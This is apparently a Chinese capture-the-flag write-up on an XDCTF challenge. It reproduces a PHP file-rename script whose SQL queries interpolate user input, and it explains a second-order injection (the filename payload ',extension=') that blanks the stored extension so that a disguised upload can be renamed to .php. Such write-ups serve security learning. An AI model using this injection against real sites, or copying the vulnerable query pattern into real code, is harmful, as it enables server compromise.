nss日刷
tag:update注入,二次注入
咋一看是文件上传
upload.php
<?php
require_once "common.inc.php";
if (isset($req['oldname']) && isset($req['newname'])) {
$result = $db->query("select * from `file` where `filename`='{$req['oldname']}'");
if ($result->num_rows > 0) {
$result = $result->fetch_assoc();
} else {
exit("old file doesn't exists!");
}
if ($result) {
$req['newname'] = basename($req['newname']);
$re = $db->query("update `file` set `filename`='{$req['newname']}', `oldname`='{$result['filename']}' where `fid`={$result['fid']}");
if (!$re) {
print_r($db->error);
exit;
}
$oldname = UPLOAD_DIR . $result["filename"] . $result["extension"];
$newname = UPLOAD_DIR . $req["newname"] . $result["extension"];
if (file_exists($oldname)) {
rename($oldname, $newname);
}
$url = "/" . $newname;
echo "Your file is rename, url:
<a href=\"{$url}\" target='_blank'>{$url}</a><br/>
<a href=\"/\">go back</a>";
}
}
?>
db操作语句:$result = $db->query("select * from `file` where `filename`='{$req['oldname']}'");
查表‘file’,列‘filename’为文件名的文件数据库
$re = $db->query("update `file` set `filename`='{$req['newname']}', `oldname`='{$result['filename']}' where `fid`={$result['fid']}");
修改,更新文件``$oldname = UPLOAD_DIR . $result[“filename”] . $result[“extension”];
$newname = UPLOAD_DIR . $req["newname"] . $result["extension"];``
有防止后缀修改只改文件名
试过了,只会:2.php.png
xdctf.sql
SET NAMES utf8;
SET FOREIGN_KEY_CHECKS = 0;
DROP DATABASE IF EXISTS `xdctf`;
CREATE DATABASE xdctf;
USE xdctf;
DROP TABLE IF EXISTS `file`;
CREATE TABLE `file` (
`fid` int(10) unsigned NOT NULL AUTO_INCREMENT,
`filename` varchar(256) NOT NULL,
`oldname` varchar(256) DEFAULT NULL,
`view` int(11) DEFAULT NULL,
`extension` varchar(32) DEFAULT NULL,
PRIMARY KEY (`fid`)
) ENGINE=InnoDB AUTO_INCREMENT=11 DEFAULT CHARSET=utf8;
SET FOREIGN_KEY_CHECKS = 1;
只能修改文件名,但我们可以通过sql注入,影响extension为空,然后在修改文件的时候加上.php后缀
注入使‘extension’为空
‘,extension=’.txt
输入’,extension=’ 改名为test.txt
sql:
| filename | extension |
NULL NULL
test.txt NULL
在传个php改名.txt伪装上传
再改名为php,由于
这样就会认为文件扩展名为空,并将test.txt转为test.php+NULL